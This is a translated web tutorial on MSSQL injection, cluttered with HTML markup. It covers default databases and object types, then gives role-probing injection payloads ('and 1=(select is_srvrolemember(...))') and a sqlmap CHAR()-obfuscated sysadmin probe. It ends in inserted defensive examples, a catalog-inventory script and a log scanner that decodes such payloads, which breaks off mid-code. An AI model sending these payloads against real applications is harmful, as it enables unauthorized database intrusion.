Advanced Security Techniques for MSSQL Injection


This article mainly covers MSSQL in penetration testing: injection bypasses, privilege-escalation ideas, and how site/database separation is handled. Much of this material has been in use for a long time. To keep up with the newer versions, everything here is done on SQL Server 2008, so some knowledge specific to older versions may not be covered.

Contents

   <ol class="linenums list-paddingleft-2">
    <li>Basics</li>
    <li>1. MSSQL basic information</li>
    <li>2. MSSQL basic statements</li>
    <li>3. MSSQL symbols</li>
    <li>4. The basic MSSQL injection workflow</li>
    <li>5. Simple bypasses for MSSQL error-based injection</li>
    <li>6. MSSQL blind injection and union injection</li>
    <li>Intermediate</li>
    <li>1. MSSQL backups and getting a shell through command execution</li>
    <li>2. MSSQL privilege escalation and site/database separation</li>
    <li>3. MSSQL bypassing Safedog (安全狗)</li>
   </ol>

Chapter 1: Basic Use of MSSQL

0x00 Introduction

Microsoft SQL Server exists in many versions, and each upgrade has tightened its security. The versions most favourable to us during a penetration test are those before 2008: from 2008 onward the database no longer runs with system privileges. To keep up with the newer versions, all of the experiments that follow are done on the 2008 version, while the methods that worked on earlier versions are introduced as well. Compared with MySQL, MSSQL is a much heavier product, and its many features make the injection process easier for us. So whenever the database is MSSQL, which supports stacked (multiple) statements, we should consider whether we can take a webshell directly.

0x01 The default databases

   <ol class="linenums list-paddingleft-2">
    <li><code>master </code><code class="com">// Records all SQL Server system-level information; this information is used to control the user databases and data operations.</code></li>
    <li><code>model </code><code class="com">// The template SQL Server provides for user databases; every new user database is based on the model database.</code></li>
    <li><code>msdb </code><code class="com">// Used by Enterprise Manager and the Agent; records job schedules, event handling, backup and restore information, and alerts and exceptions.</code></li>
    <li><code>tempdb </code><code class="com">// Provides a storage area for temporary tables and other temporary work.</code></li>
   </ol>

The database we deal with most often is master. It stores the names of all databases and similar metadata, together with many stored procedures; you can think of a stored procedure as a function call.

A stored procedure is a programmable function that is created and saved inside the database. It can consist of SQL statements and some special control structures. Stored procedures are very useful when the same function must be executed from different applications or platforms, or when specific functionality needs to be encapsulated. A stored procedure in a database can be seen as an analogue of the object-oriented approach in programming: it allows control over how data is accessed.

Taking the master database as an example, the objects above can be seen. The view master.dbo.sysdatabases stores the names of all databases, while the views in every other database store that database's own table and column names. Each database's views include syscolumns, which stores all of its fields, and the Programmability node holds our functions.

   <ol class="linenums list-paddingleft-2">
    <li><code>select name from master.dbo.sysdatabases;</code></li>
    <li><code>master</code></li>
    <li><code>tempdb</code></li>
    <li><code>model</code></li>
    <li><code>msdb</code></li>
    <li><code>test</code></li>
    <li><code>asp_net</code></li>
    <li><code>asp_test</code></li>
   </ol>

MSSQL's stored procedures are the focus of our exploitation. MSSQL natively supports multiple (stacked) statements, which also makes injection convenient; by browsing the functions under Programmability we can look up what they do and discover new things.

0x02 Introducing the fields

   <ol class="linenums list-paddingleft-2">
    <li><code>select top 1 name,xtype from sysobjects;</code></li>
    <li><code>name xtype</code></li>
    <li><code>sysrscols S</code></li>
   </ol>

xtype can be one of the following object types:
C = CHECK constraint
D = default value or DEFAULT constraint
F = FOREIGN KEY constraint
L = log
FN = scalar function
IF = inline table function
P = stored procedure
PK = PRIMARY KEY constraint (the type is K)
RF = replication filter stored procedure
S = system table
TF = table function
TR = trigger
U = user table
UQ = UNIQUE constraint (the type is K)
V = view
X = extended stored procedure
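The following T-SQL is an added example, not code from the original article: it walks the same compatibility views the text describes (sysdatabases, sysobjects, syscolumns) and the xtype codes above, as an inventory a DBA or reviewer would run. It assumes the asp_net database named in the text exists and that the login can read its catalog views.

```sql
-- Added example (not from the original article): inventory of an instance through
-- the compatibility views discussed in the text. Assumes the asp_net database exists.
USE master;

-- 1. Every database on the instance: this is what master.dbo.sysdatabases holds.
SELECT name, dbid, crdate
FROM master.dbo.sysdatabases
ORDER BY dbid;

-- 2. Object counts per xtype in one database, so an unexpected 'X' or 'P' stands out
--    against the codes listed above (U = user table, V = view, P = procedure, ...).
USE asp_net;
SELECT xtype, COUNT(*) AS objects
FROM sysobjects
GROUP BY xtype
ORDER BY xtype;

-- 3. User tables (xtype = 'U') with their columns: sysobjects joined to syscolumns on
--    the object id, the same way a column listing is built during enumeration.
SELECT o.name AS table_name,
       c.colid,
       c.name AS column_name,
       TYPE_NAME(c.xusertype) AS type_name,
       c.length
FROM sysobjects AS o
JOIN syscolumns AS c ON c.id = o.id
WHERE o.xtype = 'U'
ORDER BY o.name, c.colid;

-- 4. Extended stored procedures (xtype = 'X') live in master. Listing them lets a
--    reviewer compare the set against what the stock installation ships with.
SELECT name, crdate
FROM master.dbo.sysobjects
WHERE xtype = 'X'
ORDER BY name;

-- 5. Instance-level switches for the command-execution and OLE automation extended
--    procedures (sys.configurations, SQL Server 2005 and later). A value_in_use of 1
--    means the feature is enabled and should be justified or turned off.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');
```

On SQL Server 2005 and later, sysdatabases, sysobjects and syscolumns are compatibility views over sys.databases, sys.objects and sys.columns, so the same inventory can be written against the newer catalog views.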

0x03 Creating a database

   <ol class="linenums list-paddingleft-2">
    <li><code>use asp_net;</code></li>
    <li><code>create table admin (</code></li>
    <li><code>    id int primary key,</code></li>
    <li><code>    username varchar(50) null,</code></li>
    <li><code>    password varchar(50) null</code></li>
    <li><code>);</code></li>
    <li><code>insert into admin(id,username,password)
!important;white-space: inherit !important;"> values</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'admin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'admin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);</span></code></span></span></p></li>
   </ol>

Its query syntax is largely the same as MySQL's.

Chapter 2 MSSQL Information Gathering

0x00 Privilege check

Server level

The docs describe the IS_SRVROLEMEMBER('role'[,'login']) function; the valid values for role are user-defined server roles and the following fixed server roles:

Return type:

Return value | Description
-|-
0 | login is not a member of role.
1 | login is a member of role.
NULL | role or login is not valid, or the caller has no permission to view role membership.

From this we can construct the following statements:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'sysadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'serveradmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'setupadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'securityadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'diskadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'bulkadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
   </ol>

sqlmap's --is-dba option performs the same check, i.e. it tests whether you hold administrator privileges:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;"> AND </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">5560</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> IN </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">SELECT </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">122</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" 
style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">107</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">SELECT </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CASE WHEN </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">IS_SRVROLEMEMBER</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">115</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">121</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">115</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" 
style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">97</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">100</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">109</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: 
inherit !important;">105</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">110</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> THEN CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">49</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> ELSE CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">48</span><span class="pun" style="box-sizing: 
border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">END</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">118</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit 
!important;">112</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">120</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)))</span></code></span></span></p></li>
   </ol>
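The payload above builds every string out of CHAR() calls so that no quote characters appear in the request, and wraps the resulting 1 or 0 between the marker strings qzqkq and qvpxq so that the tool can locate the answer in the response. As an added example (not code from the original article or from sqlmap), the Python script below shows the defender's side of the same mechanics: it decodes CHAR()+CHAR() concatenations found in the query string of web access-log entries and reports which role-membership probe (IS_SRVROLEMEMBER or IS_MEMBER) each request makes. The log lines are constructed for the example, and the regular expressions are an assumption that covers the CHAR() form shown on this page, not every possible obfuscation.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# The CHAR()-obfuscated sysadmin probe from the article, URL-encoded the way it
# would appear in an access log ('+' as %2B, space as %20, '=' as %3D).
OBFUSCATED_PROBE = (
    "1%20AND%205560%20IN%20(SELECT%20("
    "CHAR(113)%2BCHAR(122)%2BCHAR(113)%2BCHAR(107)%2BCHAR(113)%2B"
    "(SELECT%20(CASE%20WHEN%20(IS_SRVROLEMEMBER("
    "CHAR(115)%2BCHAR(121)%2BCHAR(115)%2BCHAR(97)%2BCHAR(100)%2B"
    "CHAR(109)%2BCHAR(105)%2BCHAR(110))%3D1)%20THEN%20CHAR(49)%20"
    "ELSE%20CHAR(48)%20END))%2BCHAR(113)%2BCHAR(118)%2BCHAR(112)%2B"
    "CHAR(120)%2BCHAR(113)))"
)

# Constructed sample access-log lines (common log format); not taken from the page.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /item?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /item?id='
    + OBFUSCATED_PROBE + ' HTTP/1.1" 200 733',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /item?id=1%20and%201%3D'
    '(select%20is_srvrolemember(%27serveradmin%27)) HTTP/1.1" 200 512',
]

# A run of CHAR(n)+CHAR(m)+... (assumed shape: the form used by the payload above).
CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)\s*\+\s*)*CHAR\(\d+\)", re.IGNORECASE)
CHAR_ONE = re.compile(r"CHAR\((\d+)\)", re.IGNORECASE)
# Role-membership probes once their argument is a plain quoted literal.
ROLE_PROBE = re.compile(r"\b(IS_SRVROLEMEMBER|IS_MEMBER)\s*\(\s*'([^']*)'", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_char_concat(sql: str) -> str:
    """Replace each CHAR(n)+CHAR(m)+... run with the quoted literal it builds."""
    def to_literal(match) -> str:
        codes = [int(c) for c in CHAR_ONE.findall(match.group(0))]
        if any(c > 255 for c in codes):   # T-SQL CHAR() takes 0-255; leave odd input alone
            return match.group(0)
        text = "".join(chr(c) for c in codes)
        return "'" + text.replace("'", "''") + "'"   # re-escape embedded quotes
    return CHAR_RUN.sub(to_literal, sql)


def find_role_probes(sql: str) -> List[Tuple[str, str]]:
    """List (function, role) for every IS_SRVROLEMEMBER / IS_MEMBER call in a statement."""
    decoded = decode_char_concat(sql)
    return [(fn.upper(), role.lower()) for fn, role in ROLE_PROBE.findall(decoded)]


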